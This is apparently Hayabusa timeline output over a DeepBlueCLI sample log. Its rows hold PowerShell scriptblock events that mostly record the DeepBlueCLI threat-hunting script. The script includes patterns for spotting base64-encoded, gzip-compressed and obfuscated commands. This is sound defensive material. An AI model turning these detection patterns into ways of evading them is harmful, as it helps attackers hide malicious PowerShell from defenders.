""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:50.477 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:51.309 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:42:14.153 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-PowerShell/Operational"";ID=4104}|fl|more",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:42:19.463 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:42:22.680 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:42:36.639 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.016 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" 
powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.021 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host 
""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength 
$regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. 
# Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational""",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.021 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.021 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"{$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.021 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if 
command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
